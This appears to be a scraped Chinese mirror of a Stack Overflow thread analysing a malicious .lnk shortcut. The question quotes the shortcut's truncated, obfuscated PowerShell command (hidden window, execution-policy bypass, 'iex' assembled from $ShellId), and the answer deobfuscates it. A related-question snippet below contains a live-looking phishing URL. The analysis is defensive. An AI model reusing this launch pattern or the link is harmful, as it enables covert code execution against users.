个人中心
文章发布
退出
作者热门文章
- html - 出于某种原因,IE8 对我的 Sass 文件中继承的 html5 CSS 不友好?
- JMeter 在响应断言中使用 span 标签的问题
- html - 在 :hover and :active? 上具有不同效果的 CSS 动画
- html - 相对于居中的 html 内容固定的 CSS 重复背景?
25
4
我下载了一个我几乎没有考虑过的文件,但(快捷方式的)目标引起了我的注意:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]
毫无疑问,这里发生了一些可疑的事情。我理解前三个参数,但我不太明白这样的有效负载代码如何在基本快捷方式中工作?
最佳答案
我猜,它运行一个 Powershell
让我们拆分这段代码:
( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]
$ShellId 是一个内置的 Powershell 变量:
>$ShellId
Microsoft.PowerShell
因此 ( $shelliD[1]+$SHeLlID[13]+'x') 转换为 iex (= Invoke-Expression )
其余代码是 ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[省略其余代码]。我猜 char 数组包含 ascii 字符。如果是这样,我们可以将其转换为:
$aspx =
总结:
powershell.exe -NoProfile -WindowStyle 1 -ExecutionPolicy ByPass . iex "$aspx = ...."
因此它会在最小化的 Powershell 窗口中调用以 $aspx = 开头的代码,而不会出现警告或提示。
也许代码通过了这些 obfuscation methods 之一.
希望对您有所帮助。
关于powershell - 恶意软件使用 .Lnk 文件到 Powershell,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/53128098/
25
4
0
我的一个 friend 就他在 Discord 上遇到的问题联系了我。 Windows 询问下面的代码应该用什么程序运行,默认是 Discord。每次运行 Discord 时,都会运行这段代码: im
我收到了一封虚假电子邮件,其中链接了一个网站,---危险--- kadiogluhotel.com/437019344HKFAHDzE9ykByni6Qd2TQSfkSYy2z7=Q7FftdKRHH
关闭。这个问题需要更多focused .它目前不接受答案。 想改进这个问题吗? 更新问题,使其只关注一个问题 editing this post . 关闭 8 年前。 Improve this qu
现在我知道这不是一个安全或恶意软件清除网站。但是我觉得这是一个 JSF 特定的问题, 我注意到我的网站通过将 JavaScript 文件注入(inject)网页而不断受到攻击。 恶意软件正在从具有以下
我们有带有 CentOs 的 AWS ec2 实例。此实例上托管了 4 个站点,一个静态 HTML 和 PHP 站点,两个 Joomla (v3.4.5),一个 Opencart (v2.0.1.1)
我正在帮助某人清除网站上的恶意软件感染,但我很难在 sed 中正确匹配某些字符串,因此我可以创建一个脚本来批量搜索并替换/删除它。 字符串是: document.write('.vb_style_fo
恶意软件是病毒、蠕虫、特洛伊木马以及其他有害计算机程序的总称,并且很早就一直存在。而恶意软件随着时间的失衡不断发展演变,黑客利用它来进行破坏并获取敏感信息。而阻止和打击恶意软件占据了信息安全专业人
在 WiX Burn Bootstrap 中安装某些软件包时,安装会在单击 Trend Micro OfficeScan 安装后不久被中断。它将它检测为潜在的病毒/恶意软件,因为它试图写入注册表位置,
我发现每次网站加载时都会加载以下代码,请在我的博客上回复我它的功能吗?, themenest.net 是我看到的 url,当我看到加载我的网站时 eval(function (p, a, c
关闭。这个问题需要更多focused .它目前不接受答案。 想改进这个问题吗? 更新问题,使其只关注一个问题 editing this post . 关闭 5 年前。 Improve this qu
我在 Ubuntu 16.04.02 LTS 服务器上使用 Wildfly 10.1.0.Final,我将来自 letsencrypt.org 的 SSL 与 H2 (HTTP 2) 协议(proto
关闭。这个问题是opinion-based .它目前不接受答案。 想改善这个问题吗?更新问题,以便可以通过 editing this post 用事实和引文回答问题. 6年前关闭。 Improve t
我正在尝试开发一个能够使用支持向量机 (SVM) 检测 Android 平台恶意应用程序的应用程序。我可以从“logcat”和“strace”工具中获取许多系统信息,但我现在不知道如何设法检测真正的恶
我有三个网站都托管在同一个网络服务器上。最近我在其中一个网站上工作,注意到大约一个月前,一堆文件被更改了。具体来说,index.html 的所有实例都已重命名为 index.html.bak.bak,
我们在多台服务器上托管了 1000 多个域。我们遇到大量恶意软件和 phpshell 的问题。许多扫描仪的使用对取缔它们没有任何影响。也许我们从那些扫描仪中得到了 10/20 的模糊结果 所以我构建了
关闭。这个问题不符合Stack Overflow guidelines .它目前不接受答案。 我们不允许在 Stack Overflow 上提出有关专业服务器或网络相关基础设施管理的问题。您可以编辑问
我正在编写一个使用 SFML 进行渲染/输入的程序。问题是大多数防病毒程序将其检测为某种恶意软件。其中一些会在程序启动时立即显示警报(即使在 visual studio 中处于 Debug模式),而另
使用 Java 已有多年,但最近关于 JRE 零日漏洞利用的警告令人不安。 我正在考虑以下方法(全部在 Windows 7 Ultimate/64 位计算机上): 在所有浏览器中禁用 Java(早就完
今天,我们从一位客户那里收到了有关此恶意软件检测的信息: Gen:Variant.Adware.Kazy.795337 它仅在通过 qtdeploy 进程附加到我们项目的 qwebp.dll 文件中。
我是一名优秀的程序员,十分优秀!